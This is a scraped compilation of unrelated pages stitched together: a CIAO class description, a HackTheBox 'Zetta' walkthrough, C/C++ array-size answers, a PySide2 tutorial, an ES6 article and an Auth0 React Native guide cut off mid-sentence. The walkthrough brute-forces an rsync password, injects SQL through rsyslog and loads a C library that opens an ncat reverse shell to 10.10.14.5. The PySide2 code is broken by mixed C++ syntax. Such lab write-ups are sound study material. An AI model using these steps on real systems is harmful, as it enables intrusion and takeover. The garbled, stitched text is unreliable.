#include <Deployment_Configuration.h> Collaboration diagram for CIAO::Deployment_Configuration: This class provides strategies on how the Assembly framework should deploy an assembly. This is achieved by providing mappings from deployment destination names to actually CIAO daemon IORs, and the strategy for which default CIAO daemon a deployment mechanism should use. This is a trivial implementation of the deployment configuration strategy. We can enhance this class later on to provide different deployment location strategies.
https://www.dre.vanderbilt.edu/Doxygen/5.4.1/html/tao/ciao/tools/assembly_deployer/classCIAO_1_1Deployment__Configuration.html
CC-MAIN-2022-40
en
refinedweb
Zetta @ HackTheBoxxct Zetta is 40-point machine on hackthebox. We will get the ipv6 address of the box via ftp, use rsync to get access to ssh and finally abuse a sql injection in rsyslogd to get root. User Flag Open ports: 21/tcp open ftp 22/tcp open ssh 80/tcp open http On the website on port 80 we see a long string being shown as a potential ftp password, which is generated as follows: var rString = randomString(32, '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ We can use any 32 char string to connect to ftp, using it as username and password. The website also mentions RFC2428 which describes 2 commands EPRT and EPSV. By using EPRT<space><d><net-prt><d><net-addr><d><tcp-port><d> we can get the ftp server to connect to us using his ipv6 address: nc zetta.htb 21 USER a9407e837fb779abc934d6db89ed4c43 PASS a9407e837fb779abc934d6db89ed4c43 EPRT |2|dead:beef:2::1003|4444| LIST Using wireshark we can read its ipv6 address and use it for another port scan (for ease of use I added it to /etc/hosts). This time another port shows up: “8730”, which runs rsyncd. We connect and see the following message: ****** UNAUTHORIZED ACCESS TO THIS RSYNC SERVER IS PROHIBITED ****** rsync rsync://zetta6:8730 ... bin Backup access to /bin boot Backup access to /boot lib Backup access to /lib lib64 Backup access to /lib64 opt Backup access to /opt sbin Backup access to /sbin srv Backup access to /srv usr Backup access to /usr var Backup access to /var By trial and error we find that the only folder we can download with rsync is “/etc/”, which is not listed here. We find the following interesting config file: cat rsyncd.conf ... # Syncable home directory for .dot file sync for me. # NOTE: Need to get this into GitHub repository and use git for sync. [home_roy] path = /home/roy read only = no # Authenticate user for security reasons. uid = roy gid = roy auth users = roy secrets file = /etc/rsyncd.secrets # Hide home module so that no one tries to access it. list = false We can not read the secrets file, but bruteforcing the password gives the correct result in just a few minutes: for word in $(cat ~/tools/SecLists/Passwords/Leaked-Databases/rockyou-10.txt ); do sshpass -p $word rsync -6 -r rsync://roy@zetta6:8730/home_roy/ .; done We can now read user.txt as it was synced to our folder. The correct password was “computer”. We add our ssh public key to “.ssh/authorized_keys” and upload it, resulting in a ssh access as roy: rsync -vvaP -6 .ssh "rsync://roy@zetta6:8730/home_roy/" Root Flag In roys home folder we see a file “.tudu.xml” with several hints. It suggests to look at logging related things and postgres. We confirm that posgres is running on 5432 by using ss -ntp. The assumption that we have to deal with something logging related is also reinforced by the groups we have (includes adm): uid=1000(roy) gid=1000(roy) groups=1000(roy),4(adm),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev) We have some logfiles in /var/log/postgresql, for example “postgresql-11-main.log”, which is however empty. We open a terminal and run tail -f on the file to monitor it at all times. When trying to log into postgres with a wrong user ( psql -U xct) we generate some error messages, that we can see in the log. Looking back at the hints xml file we see that git files are mentioned. By searching for “.git” on the box we get 3 folders: /etc/pure-ftpd/.git /etc/nginx/.git /etc/rsyslog.d/.git I copied those folders to my local box and looked at the history with git reflog | awk '{ print $1 }' | xargs gitk. There is an interesting line in a commit for rsyslog: local7.info action(type="ompgsql" server="localhost" user="postgres" pass="test1234" db="syslog" template="sql-syslog") While the password does not work, this tells us that the “local7.info” log facility is used. By sending messages to the facility we are able to trigger an error message: logger -p local7.info "'" ... 2019-09-01 05:44:33.721 EDT [22460] postgres@syslog STATEMENT: INSERT INTO syslog_lines (message, devicereportedtime) values (' \'','2019-09-01 09:44:33') It seems like we can progress by injecting values into log messages, because these are used in a query. We have to deal with escaping single quotes here, because they get changed to \'. A way to accomplish this in postgres is to use $$ to replace all single quotes. We have to be a bit careful though because $$ is also a bash thing so we have to escape that too. We try some things and get a valid query that does not error out, despite the injection: logger -p local7.info "xct',\$\$2019-09-01 07:55:02\$\$) --" Postgres supports loading shared libraries via queries so we create one: # get version with `find / -wholename '*/bin/postgres' 2>&- | xargs -i xargs -t '{}' -V` sudo apt-get install postgresql-server-dev-11 #include "postgres.h" #include "fmgr.h" #include <stdlib.h> #ifdef PG_MODULE_MAGIC PG_MODULE_MAGIC; #endif Datum exec(PG_FUNCTION_ARGS){ system("/dev/shm/ncat 10.10.14.5 8000 -e /bin/sh"); }; PG_FUNCTION_INFO_V1(exec); gcc xct.c -I`pg_config --includedir-server` -fPIC -shared -o xct.so We upload a static ncat binary and the shared object to “/dev/shm/”. Now we can create the queries that load the shared objects and give us a shell: logger -p local7.info "xct',\$\$2019-09-01 07:55:02\$\$); CREATE OR REPLACE FUNCTION exec() RETURNS text AS \$\$/dev/shm/xct.so\$\$, \$\$exec\$\$ LANGUAGE C STRICT; -- " logger -p local7.info "xct',\$\$2019-09-01 07:55:02\$\$); SELECT exec(); -- " The shell will die after about 20-30 seconds so we have to be quick. In “/var/lib/postgresql/.ssh/id_rsa” we find a ssh private key for postgres which we can use to connect. The final step is to look at .psql_history and see the password the user has: “sup3rs3cur3p4ass@postgres”. Remembering the hints file we infer the root password “sup3rs3cur3p4ass@root” and can su to root. Thanks to jkr for making the box!
https://www.vulndev.io/2020/02/22/zetta-hackthebox/
CC-MAIN-2022-40
en
refinedweb
Query explained:)? How to find the size of a pointer pointing to an array? Answer #1: No, you can’t. The compiler doesn’t know what the pointer is pointing to. There are tricks, like ending the array with a known out-of-band value and then counting the size up until that value, but that’s not using sizeof(). Another trick. Answer #2:. Answer #3:: #if !defined(ARRAY_SIZE) #define ARRAY_SIZE(x) (sizeof((x)) / sizeof((x)[0])) #endif int main() { int days[] = {1,2,3,4,5}; int *ptr = days; printf("%u\n", ARRAY_SIZE(days)); printf("%u\n", sizeof(ptr)); return 0; } You can google for reasons to be wary of macros like this. Be careful. If possible, the C++ stdlib such as vector which is much safer and easier to use. Answer #4: There is a clean solution with C++ templates, without using sizeof(). The following getSize() function returns the size of any static array: #include <cstddef> template<typename T, size_t SIZE> size_t getSize(T (&)[SIZE]) { return SIZE; } Here is an example with a foo_t structure: #include <cstddef> template<typename T, size_t SIZE> size_t getSize(T (&)[SIZE]) { return SIZE; } struct foo_t { int ball; }; int main() { foo_t foos3[] = {{1},{2},{3}}; foo_t foos5[] = {{1},{2},{3},{4},{5}}; printf("%u\n", getSize(foos3)); printf("%u\n", getSize(foos5)); return 0; } Output: 3 5 How to find the size of a pointer pointing to an array? Answer #5:: #define ARRAY_SZ 10 void foo (int (*arr)[ARRAY_SZ]) { printf("%u\n", (unsigned)sizeof(*arr)/sizeof(**arr)); }. int x[20]; int y[10]; foo(&x); /* error */ foo(&y); /* ok */ If the function is supposed to be able to operate on any size of array, then you will have to provide the size to the function as additional information. Answer #6:. #include <stdio.h> #define NUM_DAYS 5 typedef int days_t[ NUM_DAYS ]; #define SIZEOF_DAYS ( sizeof( days_t ) ) int main() { days_t days; days_t *ptr = &days; printf( "SIZEOF_DAYS: %u\n", SIZEOF_DAYS ); printf( "sizeof(days): %u\n", sizeof(days) ); printf( "sizeof(*ptr): %u\n", sizeof(*ptr) ); printf( "sizeof(ptr): %u\n", sizeof(ptr) ); return 0; } Output: SIZEOF_DAYS: 20 sizeof(days): 20 sizeof(*ptr): 20 sizeof(ptr): 4 Answer #7: My solution to this problem is to save the length of the array into a struct Array as a meta-information about the array. #include <stdio.h> #include <stdlib.h> struct Array { int length; double *array; }; typedef struct Array Array; Array* NewArray(int length) { /* Allocate the memory for the struct Array */ Array *newArray = (Array*) malloc(sizeof(Array)); /* Insert only non-negative length's*/ newArray->length = (length > 0) ? length : 0; newArray->array = (double*) malloc(length*sizeof(double)); return newArray; } void SetArray(Array *structure,int length,double* array) { structure->length = length; structure->array = array; } void PrintArray(Array *structure) { if(structure->length > 0) { int i; printf("length: %d\n", structure->length); for (i = 0; i < structure->length; i++) printf("%g\n", structure->array[i]); } else printf("Empty Array. Length 0\n"); } int main() { int i; Array *negativeTest, *days = NewArray(5); double moreDays[] = {1,2,3,4,5,6,7,8,9,10}; for (i = 0; i < days->length; i++) days->array[i] = i+1; PrintArray(days); SetArray(days,10,moreDays); PrintArray(days); negativeTest = NewArray(-5); PrintArray(negativeTest); return 0; } But you have to care about set the right length of the array you want to store, because the is no way to check this length, like our friends massively explained. Hope you learned something from this post. Follow Programming Articles for more!
https://programming-articles.com/how-to-find-the-size-of-a-pointer-pointing-to-an-array-answered/
CC-MAIN-2022-40
en
refinedweb
Application Example¶ The Application example shows how to implement a standard GUI application with menus, toolbars, and a status bar. The example itself is a simple text editor program built around QPlainTextEdit. Nearly all of the code for the Application example is in the MainWindowclass, which inherits QMainWindow. QMainWindowprovides the framework for windows that have menus, toolbars, dock windows, and a status bar. The application provides File, Edit, and Help entries in the menu bar, with the following popup menus:¶section, we reimplement closeEvent()to detect when the user attempts to close the window, and warn the user about unsaved changes. In the private slotssection, we declare slots that correspond to menu entries, as well as a mysterious documentWasModified()slot. Finally, in the privatesection of the class, we have various members that will be explained in due time. MainWindow Class Implementation¶ from PySide2.QtGui import *.hand.def __init__(self): QMainWindow.__init__(self) textEdit = QPlainTextEdit() setCentralWidget(textEdit) createActions() createMenus() createToolBars() createStatusBar() readSettings() connect(textEdit.document(), SIGNAL("contentsChanged()"), self, SLOT("documentWasModified()")) setCurrentFile("") setUnifiedTitleAndToolBarOnMac(True) In the constructor, we start by creating a QPlainTextEditwidget as a child of the main window (the thisobject). Then we call‘s.def closeEvent(self,.def File(self): if maybeSave(): textEdit.clear() setCurrentFile("") The newFile()slot is invoked when the user selects File|New from the menu. We call maybeSave()to save any pending changes and if the user accepts to go on, we clear the QPlainTextEditand call the private function setCurrentFile()to update the window title and clear the windowModifiedflag.def open(self): if maybeSave(): fileName = QFileDialog.getOpenFileName(self) if !fileName.isEmpty(): loadFile(fileName) The open()slot is invoked when the user clicks File|Open. We pop up a QFileDialogasking the user to choose a file. If the user chooses a file (i.e., fileNameis not an empty string), we call the private function loadFile()to actually load the file.def save(self):.def saveAs(self): fileName = QFileDialog.getSaveFileName(self) if fileName.isEmpty(): return False return saveFile(fileName) In saveAs(), we start by popping up a QFileDialogasking the user to provide a name. If the user clicks Cancel, the returned file name is empty, and we do nothing.def about(self): QMessageBox.about(self, tr("About Application"), tr("The <b>Application</b> example demonstrates how to " "write modern GUI applications using Qt, with a menu bar, " "toolbars, and a status bar.")) The application’s About box is done using one statement, using the.def documentWasModified(self): setWindowModified(textEdit.document().isModified()) The documentWasModified()slot is invoked each time the text in the QPlainTextEditchanges because of user edits. We call setWindowModified()to make the title bar show that the file was modified. How this is done varies on each platform.def MainWindow.createActions(self): Act = QAction(QIcon(":/images/new.png"), tr("&New"), self) Act.setShortcuts(QKeySequence.New) Act.setStatusTip(tr("Create a new file")) connect(Act, SIGNAL("triggered()"), self, SLOT("newFile()")) openAct = QAction(QIcon(":/images/open.png"), tr("&Open..."), self) openAct.setShortcuts(QKeySequence.Open) openAct.setStatusTip(tr("Open an existing file")) connect(openAct, SIGNAL("triggered()"), self, SLOT("open()")) ... aboutQtAct = QAction(tr("About &Qt"), self) aboutQtAct.setStatusTip(tr("Show the Qt library's About box")) connect(aboutQtAct, SIGNAL("triggered()"), qApp, SLOT("aboutQt()")) The createActions()private function, which is called from the MainWindowconstructor, creates QActions and populates the menus and two toolbars. The code is very repetitive, so we show only the actions corresponding to File|New, File|Open, and Help|About Qt. A QActionis an object that represents one user action, such as saving a file or invoking a dialog. An action can be put in a QMenuor a QToolBar, or both, or in any other widget that reimplementscan be created by passing a parent QObjector by using one of the convenience functions of QMenu, QMenuBaror QToolBar. We create the actions that are in a menu as well as in a toolbar parented on the window to prevent ownership issues. For actions that are only in the menu, we use the convenience function addAction(). The code above contains one more idiom that must be explained. For some of the actions, we specify an icon as a QIconto the QActionconstructor. We usefilePlainTextEditcontains selected text. We disable them by default and connect the copyAvailable()signal to the setEnabled()slot, ensuring that the actions are disabled when the text editor has no selection. Just before we create the Help menu, we call addSeparator(). This has no effect for most widget styles (e.g., Windows and macOS styles), but for some styles this makes sure that Help is pushed to the right side of the menu bar.def createStatusBar(self): statusBar().showMessage(tr("Ready")) statusBar()returns a pointer to the main window’s QStatusBarwidget. Like with menuBar(), the widget is automatically created the first time the function is called.def readSettings(self): settings("Trolltech", "Application Example") pos = settings.value("pos", QPoint(200, 200)).toPoint() size = settings.value("size", QSize(400, 400)).toSize() resize(size) move(pos) The readSettings()function is called from the constructor to load the user’s preferences and other application settings. The QSettingsclass provides a high-level interface for storing settings permanently on disk. On Windows, it uses the (in)famous Windows registry; on macOS , it uses the native XML-based CFPreferences API; on Unix/X11, it uses text files. The QSettingsconstructor takes arguments that identify your company and the name of the product. This ensures that the settings for different applications are kept separately. We use value()to extract the value of the geometry setting. The second argument to value()is optional and specifies a default value for the setting if there exists none. This value is used the first time the application is run. We use saveGeometry()and Widget::restoreGeometry() to save the position. They use an opaque QByteArrayto store screen number, geometry and window state.def writeSettings(self): settings = QSettings("Trolltech", "Application Example") settings.setValue("pos", pos()) settings.setValue("size", size()) The writeSettings()function is called from closeEvent(). Writing settings is similar to reading them, except simpler. The arguments to the QSettingsconstructor must be the same as in readSettings().def maybeSave(self): if textEdit.document()->isModified(): ret = QMessageBox.warning(self, tr("Application"), tr("The document has been modified.\n" "Do you want to save your changes?"), QMessageBox.Save | QMessageBox.Discard | QMessageBox.Cancel) if ret == QMessageBox.Save: return save() elif ret == QMessageBox.Cancel: return False return True The maybeSave()function is called to save pending changes. If there are pending changes, it pops up a QMessageBoxgiving the user to save the document. The options are Yes, No, and Cancel. The Yes button is made the default button (the button that is invoked when the user presses Return) using the Defaultflag; the Cancel button is made the escape button (the button that is invoked when the user presses Esc) using the Escapeflag. The maybeSave()function returns truein all cases, except when the user clicks Cancel or saving the file fails. The caller must check the return value and stop whatever it was doing if the return value is false.def loadFile(self, fileName): file = QFile(fileName) if !file.open(QFile.ReadOnly | QFile.Text): QMessageBox.warning(self, tr("Application"), tr("Cannot read file %1:\n%2.") .arg(fileName) .arg(file.errorString())) return in = QTextStream(file) QApplication.setOverrideCursor(Qt::WaitCursor) textEdit.setPlainText(in.readAll()) QApplication.restoreOverrideCursor() setCurrentFile(fileName) statusBar().showMessage(tr("File loaded"), 2000) In loadFile(), we use QFileand QTextStreamto read in the data. The QFileobject provides access to the bytes stored in a file. We start by opening the file in read-only mode. The Textflagobject to read in the data. QTextStreamautomatically converts the 8-bit data into a Unicode QStringand supports various encodings. If no encoding is specified, QTextStreamassumes the file is written using the system’s default 8-bit encoding (for example, Latin-1; see codecForLocale()for details). Since the call to readAll()might take some time, we set the cursor to be WaitCursorfor the entire application while it goes on. At the end, we call the private setCurrentFile()function, which we’ll cover in a moment, and we display the string “File loaded” in the status bar for 2 seconds (2000 milliseconds).def saveFile(self, fileName): file = QFile(fileName) if !file.open(QFile.WriteOnly | QFile::Text): QMessageBox.warning(self, tr("Application"), tr("Cannot write file %1:\n%2.") .arg(fileName) .arg(file.errorString())) return False out = QTextStream(file) QApplication.setOverrideCursor(Qt.WaitCursor) out << textEdit.toPlainText() QApplication.restoreOverrideCursor() setCurrentFile(fileName) statusBar().showMessage(tr("File saved"), 2000) return True Saving a file is similar to loading one. We use QSaveFileto ensure all data are safely written and existing files are not damaged should writing fail. We use the Textflag to make sure that on Windows, “\n” is converted into “\r\n” to conform to the Windows convention.def setCurrentFile(fileName): curFile = fileName textEdit.document().setModified(False) setWindowModified(False) if curFile.isEmpty(): shownName = "untitled.txt" else: shownName = strippedName(curFile) setWindowTitle(tr("%1[*] - %2").arg(shownName).arg(tr("Application"))) The setCurrentFile()function is called to reset the state of a few variables when a file is loaded or saved, or when the user starts editing a new file (in which case fileNameis empty). We update the curFilevariable, clear the modifiedflag and the associated QWidget:windowModifiedflag, and update the window title to contain the new file name (or untitled.txt). The strippedName()function call around curFilein the setWindowTitle()call shortens the file name to exclude the path. Here’s the function:def strippedName(self, fullFileName): return QFileInfo(fullFileName).fileName() The main() Function¶Parserto check whether some file argument was passed to the application and loads it via MainWindow::loadFile(). The Resource File¶file, an XML-based file format that lists files on the disk. Here’s the application.qrcfile that’s used by the Application example:<Code snippet "/tmp/snapshot-qt5full-5.14.0/qt5/qtbase/mainwindows/application/application.qrc" not found> The .pngfiles listed in the application.qrcfile are files that are part of the Application example’s source tree. Paths are relative to the directory where the application.qrcfile is located (the mainwindows/applicationdirectory). The resource file must be mentioned in the application.profile so that qmakeknows about it:<Code snippet "mainwindows/application/application.pro:0" not found> qmakewill produce make rules to generate a file called qrc_application.cppthat is linked into the application. This file contains all the data for the images and other resources as static C++ arrays of compressed binary data. See The Qt Resource System for more information about resources..
https://doc.qt.io/qtforpython/overviews/qtwidgets-mainwindows-application-example.html
CC-MAIN-2020-05
en
refinedweb
The fastai library structures its training process around the Learner class, whose object binds together a PyTorch model, a dataset, an optimizer, and a loss function; the entire learner object then will allow us to launch training. basic_train defines this Learner class, along with the wrapper around the PyTorch optimizer that the library uses. It defines the basic training loop that is used each time you call the fit method (or one of its variants) in fastai. This training loop is very bare-bones and has very few lines of codes; you can customize it by supplying an optional Callback argument to the fit method. callback defines the Callback class and the CallbackHandler class that is responsible for the communication between the training loop and the Callback's methods. The CallbackHandler maintains a state dictionary able to provide each Callback object all the information of the training loop it belongs to, putting any imaginable tweaks of the training loop within your reach. callbacks implements each predefined Callback class of the fastai library in a separate module. Some modules deal with scheduling the hyperparameters, like callbacks.one_cycle, callbacks.lr_finder and callback.general_sched. Others allow special kinds of training like callbacks.fp16 (mixed precision) and callbacks.rnn. The Recorder and callbacks.hooks are useful to save some internal data generated in the training loop. train then uses these callbacks to implement useful helper functions. Lastly, metrics contains all the functions and classes you might want to use to evaluate your training results; simpler metrics are implemented as functions while more complicated ones as subclasses of Callback. For more details on implementing metrics as Callback, please refer to creating your own metrics. from fastai.vision import * path = untar_data(URLs.MNIST_SAMPLE) data = ImageDataBunch.from_folder(path) URLs.MNIST_SAMPLE is a small subset of the classic MNIST dataset containing the images of just 3's and 7's for the purpose of demo and documentation here. Common datasets can be downloaded with untar_data - which we will use to create an ImageDataBunch object model = simple_cnn((3,16,16,2)) learn = Learner(data, model) learn.fit(1) learn.metrics=[accuracy] learn.fit(1) cb = OneCycleScheduler(learn, lr_max=0.01) learn.fit(1, callbacks=cb) learn.recorder.plot_lr(show_moms=True) Many of the callbacks can be used more easily by taking advantage of the Learner extensions in train. For instance, instead of creating OneCycleScheduler manually as above, you can simply call Learner.fit_one_cycle: learn.fit_one_cycle(1) Note that if you're training a model for one of our supported applications, there's a lot of help available to you in the application modules: For instance, let's use cnn_learner (from vision) to quickly fine-tune a pre-trained Imagenet model for MNIST (not a very practical approach, of course, since MNIST is handwriting and our model is pre-trained on photos!). learn = cnn_learner(data, models.resnet18, metrics=accuracy) learn.fit_one_cycle(1)
https://docs.fast.ai/training.html
CC-MAIN-2020-05
en
refinedweb
ECMASCRIPT 2015 or ES6 has introduced many changes to JavaScript. JavaScript ES6 has introduced new syntax and new awesome features to make your code more modern and more readable. Originally published by Adesh at zeptobook.comWhat is ES6? ECMASCRIPT 2015 or ES6 has introduced many changes to JavaScript. JavaScript ES6 has introduced new syntax and new awesome features to make your code more modern and more readable. ES6 introduced many great features like arrow functions, template strings, class destructions, modules… and many more. Let’s dive into more reasons of its popularities.Reason 1: You can write it now for all Browsers. ES6 is now supported in all major browsers. Here is the list of Browsers support for ES6. Photo Courtesy: W3Schools.comReason 2: Full Backward Browser Compatible It has support for backward compatible version of JavaScript in current and older browsers or environments. JavaScript being a rich ecosystem, has hundreds of packages on the package manager (NPM), and it has been adopted worldwide. To make sure ES5 JavaScript packages should always work in the presence of ES6, they decided to make it 100% backward compatible. This has one major benefit. You can start writing ES6 along with your existing JavaScript ES5. This also help you to start slowly embracing new features and adopting the aspects of ES6, which can make your life easier as a programmer. To support full backward browser compatibility, here is a very cool project called Babel. Babel is a JavaScript Transpiler that converts edge JavaScript into plain old ES5 JavaScript that can run in any browser. For more details about Babel, please click the below links. Babel Usage Guide. How to setup Babel?Reason 3: ES6 is faster in some cases. I am going to share one performance benchmark for ES6. ES6 performed more better or even hit the performance benchmark for the same function written in ES5. You can visit this link as well to check the ES6 performance benchmark. Performance of ES6 features relative to the ES5 baseline operations per secondReason 4: Doing more with writing less code As said above, now you can do lot more with writing less code in your ES6. You can write more cleaner and concise code in ES6. Here is few examples of code syntax of ES6. No need to write function and return keywords anymore. This is one of the more awesome feature of ES6, makes your code looks more readable, more structured, and looks like modern code. You don’t need to write old syntax anymore. An arrow function expression has a shorter syntax than a function expression and does not have its own this, arguments, super, or new.target. One of the benefit of arrow function is to have either concise body or the usual block body. In a concise body, only an expression is mentioned in a single line with the implicit return value. In a block body, you must use explicit return keyword, normally with curly braces { return .. }. var func = x => x * x; // concise body with implicit return keyword var func = (x, y) => { return x + y; }; // block body with explicit return keyword ES6 will throw an error if there is an improper line break in arrow function. Ideally, it should be single line statement. If you want to use it as multi line statement, use the proper curly braces or brackets. var func = (a, b, c) => 1; // Throw syntax error //Use Proper syntax var func = ( a, b, c ) => ( 1 ); // no SyntaxError thrown //ES6 odds = evens.map(v => v + 1) //ES5 odds = evens.map(function (v) { return v + 1; }); Simple and smart way of passing default values of function parameters. Now, functions can be defined with default parameters values. If you miss to pass the function parameter, then missing or undefined values will be initialized with default parameters. Default parameter will prevent you from getting the undefined error. If you forget to write the parameter, it won’t return the undefined error, because the parameter is already defined in the function parameter. //ES6 function f (a, b = 10, c = 20) { return x + y + z } f(5) === 35 //ES5 function f (a, b, c) { if (b === undefined) y = 10; if (c === undefined) c = 20; return x + y + z; }; f(1) === 35; Easy way to pass rest parameters with three dots (…) with parameter name. With the help of rest parameter, you can pass an indefinite number of arguments as an array. A function last parameter prefixed with ... which will cause all remaining arguments to be placed within a standard JavaScript array. Only a last parameter can be a rest parameter. One of the major difference between argument object and rest parameter is that, rest parameter are like real array instance, where argument object are not like a real array. This means that, you can apply array methods like sort, map, forEach or pop on it directly. //ES6 function f (a, b, ...z) { return (a + b) * z.length } f(10, 20, "ZeptoBook", true, 5) === 25 //ES5 function f (a, b) { var z = Array.prototype.slice.call(arguments, 2); return (a + b) * z.length; }; f(10, 20, "ZeptoBook", true, 5) === 25 Concatenating the string in a more cleaner way. Template literals are string literals, which allow concatenated expression. String interpolation is one of the interesting feature of ES6. Prior to ES6, we use double or single quotes to concatenate string expression, which sometimes looks very weird and buggy. Now, in ES6, template literals are enclosed by back-ticks () character instead of single or double quotes. You can find back-ticks at the top left of your keyboard under the esc key. Template literals has placeholders with $ sign and curly braces like ${expression}. $ sign is mandatory for interpolation. //ES6 var product = { quantity: 20, name: "Macbook", unitprice: 1000 } var message = I want to buy ${product.name}, for a total of ${product.unitprice * product.quantity} bucks? //ES5 var product = { quantity: 20, name: "Macbook", unitprice: 1000 } var message = "I want to buy " + product.name + ",\n" + "for a total of " + (product.unitprice * product.quantity) + " bucks?"; Shorter syntax for defining object properties. Prior to ES6, every object property needs to be either getter-setter or key-value pair. This has been completely changed in ES6. In ES6, there is a concise way for defining the object properties. You can define complex object properties in a much cleaner way now. //ES6 var x = 0, y = 0 obj = { x, y } //ES5 var x = 0, y = 0; obj = { x: x, y: y }; Support for method notation in object properties definitions. In the same way, which we discussed above, we can now define object methods concisely and in a much cleaner way. //ES6Reason 5: New Built-In Methods In ES6 obj = { add (a, b) { … }, multi (x, y) { … }, } //ES5 obj = { add: function (a, b) { … }, multi: function (x, y) { … }, }; There is a new function to assign enumerable properties of one or more source objects into a destination object.//ES6 var dest = { quux: 0 } var src1 = { foo: 1, bar: 2 } var src2 = { foo: 3, baz: 4 } Object.assign(dest, src1, src2) dest.quux === 0 dest.foo === 3 dest.bar === 2 dest.baz === 4 //ES5 var dest = { quux: 0 }; var src1 = { foo: 1, bar: 2 }; var src2 = { foo: 3, baz: 4 }; Object.keys(src1).forEach(function(k) { dest[k] = src1[k]; }); Object.keys(src2).forEach(function(k) { dest[k] = src2[k]; }); dest.quux === 0; dest.foo === 3; dest.bar === 2; dest.baz === 4; There is a new function to find an element in an array. //ES6 [ 10, 30, 40, 20 ].find(x => x > 30) // 40 [ 10, 30, 40, 20 ].findIndex(x => x > 30) // 20 //ES5 [ 10, 30, 40, 20 ].filter(function (x) { return x > 30; })[0]; // 40 // no such function in ES5 There is a new string repeating functionality as well. //ES6 " ".repeat(5 * depth) "bar".repeat(3) //ES5 Array((5 * depth) + 1).join(" "); Array(3 + 1).join("bar"); New string functions to search for a sub-string //ES6 "zepto".startsWith("epto", 1) // true "zepto".endsWith("zept", 4) // true "zepto".includes("zep") // true "zepto".includes("zep", 1) // true "zepto".includes("zep", 2) // false //ES5 "zepto".indexOf("epto") === 1; // true "zepto".indexOf("zept") === (4 - "zept".length); // true "zepto".indexOf("ept") !== -1; // true "zepto".indexOf("ept", 1) !== -1; // true "zepto".indexOf("ept", 2) !== -1; // false There are new functions for checking non-numbers and finite numbers. //ES6 Number.isNaN(50) === false Number.isNaN(NaN) === true Number.isFinite(Infinity) === false Number.isFinite(-Infinity) === false Number.isFinite(NaN) === false Number.isFinite(50) === true //ES5 var isNaN = function (n) { return n !== n; }; var isFinite = function (v) { return (typeof v === "number" && !isNaN(v) && v !== Infinity && v !== -Infinity); }; isNaN(50) === false; isNaN(NaN) === true; isFinite(Infinity) === false; isFinite(-Infinity) === false; isFinite(NaN) === false; isFinite(50) === true; There is an in-built function to check whether an integer number is in the safe range. //ES6 Number.isSafeInteger(50) === true Number.isSafeInteger(1208976886688) === false //ES5 function isSafeInteger (n) { return ( typeof n === 'number' && Math.round(n) === n && -(Math.pow(2, 53) - 1) <= n && n <= (Math.pow(2, 53) - 1) ); } isSafeInteger(50) === true; isSafeInteger(1208976886688) === false; There is a mathematical function to truncate a floating number to its integral parts, completely dropping the fractional part. //ES6Summary console.log(Math.trunc(12.7)) // 12 console.log(Math.trunc(0.4)) // 0 console.log(Math.trunc(-0.4)) // -0 //ES5 function mathTrunc (x) { return (x < 0 ? Math.ceil(x) : Math.floor(x)); } console.log(mathTrunc(12.7)) // 12 console.log(mathTrunc(0.4)) // 0 console.log(mathTrunc(-0.4)) // -0 Javascript surely isn’t a perfect language. It has various imperfections. In the course of recent years, developers have gotten increasingly more involvement with the JavaScript ES5, which has lead to enhancements. ES6 brings many engrossing features that were not seen in previous version like ES5. Originally published by Adesh at zeptobook.com =========================================== Thanks for reading :heart: If you liked this post, share it with all of your programming buddies! Follow me on Facebook | TwitterLearn More!
https://morioh.com/p/y7BwGAvnzblM
CC-MAIN-2020-05
en
refinedweb
React Native This tutorial demonstrates how to add user login to a React Native application using Auth0. Install Dependencies How to install the React Native Auth0 module. yarn yarn add react-native-auth0 npm npm install react-native-auth0 --save Additional iOS step: Install the Module Pod CocoaPods is the package management tool for iOS that the React Native framework uses to install itself into your project. For the iOS native module to work with your iOS app you must first install the library Pod. If you're familiar with older React Native SDK versions, this is similar to what was called linking a native module. The process is now simplified: Change directory into the ios folder and run pod install. cd ios pod install The first step in adding authentication to your application is to provide a way for your users to log in. The fastest, most secure, and most feature-rich way to do this with Auth0 is to use the hosted login page. Integrate Auth0 in your Application Configure Android In the file android/app/src/main/AndroidManifest.xml you must make sure the activity you are going to receive the authentication on has a launchMode value of singleTask and that it declares the following intent filter (see the React Native docs for more information): <intent-filter> <action android: <category android: <category android: <data android: </intent-filter> The sample app declares this inside the MainActivity like this: <activity android: <intent-filter> <action android: <category android: </intent-filter> <intent-filter> <action android: <category android: <category android: <data android: </intent-filter> </activity> Configure iOS In the file ios/<YOUR PROJECT>/AppDelegate.m add the following: #import <React/RCTLinkingManager.h> - (BOOL)application:(UIApplication *)application openURL:(NSURL *)url sourceApplication:(NSString *)sourceApplication annotation:(id)annotation { return [RCTLinkingManager application:application openURL:url sourceApplication:sourceApplication annotation:annotation]; } Next you will need to add a URLScheme using your App's bundle identifier. Inside the ios folder open the Info.plist and locate the value for CFBundleIdentifier <key>CFBundleIdentifier</key> <string>$(PRODUCT_BUNDLE_IDENTIFIER)</string> then below register a URL type entry using the value of CFBundleIdentifier as the value for the CFBundleURLSchemes <key>CFBundleURLTypes</key> <array> <dict> <key>CFBundleTypeRole</key> <string>None</string> <key>CFBundleURLName</key> <string>auth0</string> <key>CFBundleURLSchemes</key> <array> <string>$(PRODUCT_BUNDLE_IDENTIFIER)</string> </array> </dict> </array> Take note of this value as you'll be using it to define the callback URLs below. If desired, you can change it using XCode in the following way: - Open the ios/<YOUR PROJECT>.xcodeprojfile or run xed ioson a Terminal from the app root. - Open your project's or desired target's Build Settings tab and find the section that contains "Bundle Identifier". - Replace the "Bundle Identifier" value with your desired application's bundle identifier name. For additional information please read react native docs.. iOS Callback URL {PRODUCT_BUNDLE_IDENTIFIER}://YOUR_DOMAIN/ios/{PRODUCT_BUNDLE_IDENTIFIER}/callback Remember to replace {PRODUCT_BUNDLE_IDENTIFIER} with your actual application's bundle identifier name. Android Callback URL {YOUR_APP_PACKAGE_NAME}://YOUR_DOMAIN/android/{YOUR_APP_PACKAGE_NAME}/callback Remember to replace {YOUR_APP_PACKAGE_NAME} with your actual application's package name.. iOS logout URL {PRODUCT_BUNDLE_IDENTIFIER}://YOUR_DOMAIN/ios/{PRODUCT_BUNDLE_IDENTIFIER}/callback Remember to replace {PRODUCT_BUNDLE_IDENTIFIER} with your actual application's bundle identifier name. Android logout URL {YOUR_APP_PACKAGE_NAME}://YOUR_DOMAIN/android/{YOUR_APP_PACKAGE_NAME}/callback Remember to replace {YOUR_APP_PACKAGE_NAME} with your actual application's package name. Add Authentication with Auth0 Universal login is the easiest way to set up authentication in 